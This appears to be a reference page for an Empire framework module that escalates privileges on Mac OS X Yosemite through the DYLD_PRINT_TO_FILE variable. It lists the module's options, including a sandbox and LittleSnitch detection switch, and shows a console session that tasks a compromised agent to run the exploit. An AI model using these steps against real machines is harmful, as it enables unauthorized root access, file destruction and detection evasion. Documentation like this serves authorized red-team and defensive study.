Mac OSX Yosemite DYLD_PRINT_TO_FILE Privilege Escalation - Empire Module

This page contains detailed information about how to use the python/privesc/osx/dyld_print_to_file Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Mac OSX Yosemite DYLD_PRINT_TO_FILE Privilege Escalation
Module: python/privesc/osx/dyld_print_to_file
Source code [1]: empire/server/modules/python/privesc/osx/dyld_print_to_file.yaml
Source code [2]: empire/server/modules/python/privesc/osx/dyld_print_to_file.py
MITRE ATT&CK: TA0004
Language: Python
Needs admin: No
OPSEC safe: No
Background: No

This modules takes advantage of the environment variable DYLD_PRINT_TO_FILE in order to escalate privileges on all versions Mac OS X YosemiteWARNING: In order for this exploit to be performed files will be overwritten and deleted. This can set off endpoint protection systems and as of initial development, minimal testing has been performed.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the dyld_print_to_file module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the dyld_print_to_file module:

Agent
Agent used to Privesc from.

FileName
The filename to use when the temporary file is dropped to disk.
Default value: error.log.

Listener
Listener to use.

SafeChecks
Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.
Default value: True.

WriteablePath
Full path to where the file should be written. Defaults to /tmp/.
Default value: /tmp/.

Additional Module Options

---

This is a list of additional options that are supported by the dyld_print_to_file module:

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

Dyld_print_to_file Example Usage

---

Here's an example of how to use the dyld_print_to_file module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/osx/ducky) > usemodule python/privesc/osx/dyld_print_to_file

 Author       @checky_funtime                                                        
 Background   False                                                                  
 Comments     References:                                                            
              https://github.com/rapid7/metasploit-framework/blob/master/modules/exp 
              loits/osx/local/dyld_print_to_file_root.rb                             
              http://www.sektioneins.com/en/blog/15-07-07-dyld_print_to_file_lpe.htm 
              l                                                                      
 Description  This modules takes advantage of the environment variable               
              DYLD_PRINT_TO_FILE in order to escalate privileges on all versions Mac 
              OS X YosemiteWARNING: In order for this exploit to be performed files  
              will be overwritten and deleted. This can set off endpoint protection  
              systems and as of initial development, minimal testing has been        
              performed.                                                             
 Language     python                                                                 
 Name         python/privesc/osx/dyld_print_to_file                                  
 NeedsAdmin   False                                                                  
 OpsecSafe    False                                                                  
 Techniques   http://attack.mitre.org/techniques/TA0004                              


,Record Options-,-----------,----------,-------------------------------------,
| Name          | Value     | Required | Description                         |
|---------------|-----------|----------|-------------------------------------|
| Agent         |           | True     | Agent used to Privesc from          |
|---------------|-----------|----------|-------------------------------------|
| FileName      | error.log | True     | The filename to use when the        |
|               |           |          | temporary file is dropped to disk.  |
|---------------|-----------|----------|-------------------------------------|
| Listener      |           | True     | Listener to use.                    |
|---------------|-----------|----------|-------------------------------------|
| SafeChecks    | True      | True     | Switch. Checks for LittleSnitch or  |
|               |           |          | a SandBox, exit the staging process |
|               |           |          | if true. Defaults to True.          |
|---------------|-----------|----------|-------------------------------------|
| UserAgent     | default   | False    | User-agent string to use for the    |
|               |           |          | staging request (default, none, or  |
|               |           |          | other).                             |
|---------------|-----------|----------|-------------------------------------|
| WriteablePath | /tmp/     | True     | Full path to where the file should  |
|               |           |          | be written. Defaults to /tmp/.      |
'---------------'-----------'----------'-------------------------------------'

(Empire: usemodule/python/privesc/osx/dyld_print_to_file) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/privesc/osx/dyld_print_to_file) > set FileName error.log
[*] Set FileName to error.log
(Empire: usemodule/python/privesc/osx/dyld_print_to_file) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/python/privesc/osx/dyld_print_to_file) > set SafeChecks True
[*] Set SafeChecks to True
(Empire: usemodule/python/privesc/osx/dyld_print_to_file) > set WriteablePath /tmp/
[*] Set WriteablePath to /tmp/
(Empire: usemodule/python/privesc/osx/dyld_print_to_file) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

---

• @checky_funtime

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/python/privesc/osx/dyld_print_to_file.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/python/privesc/osx/dyld_print_to_file.py
• https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/dyld_print_to_file_root.rb
• http://www.sektioneins.com/en/blog/15-07-07-dyld_print_to_file_lpe.html
• http://attack.mitre.org/techniques/TA0004

See Also

---

Check also the following modules related to this module:

• python/privesc/osx/piggyback
• python/situational_awareness/network/active_directory/get_fileservers
• powershell/situational_awareness/network/powerview/get_fileserver
• powershell/collection/file_finder
• powershell/collection/find_interesting_file
• python/persistence/multi/desktopfile
• python/situational_awareness/network/active_directory/dscl_get_groups
• python/situational_awareness/network/active_directory/get_groups
• python/situational_awareness/network/active_directory/get_computers
• python/situational_awareness/network/active_directory/get_userinformation
• python/situational_awareness/network/active_directory/get_users
• python/situational_awareness/network/active_directory/dscl_get_groupmembers
• python/situational_awareness/network/active_directory/get_groupmembers
• python/situational_awareness/network/active_directory/get_ous
• python/situational_awareness/network/active_directory/dscl_get_users
• python/situational_awareness/network/active_directory/get_groupmemberships
• python/situational_awareness/network/active_directory/get_domaincontrollers

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.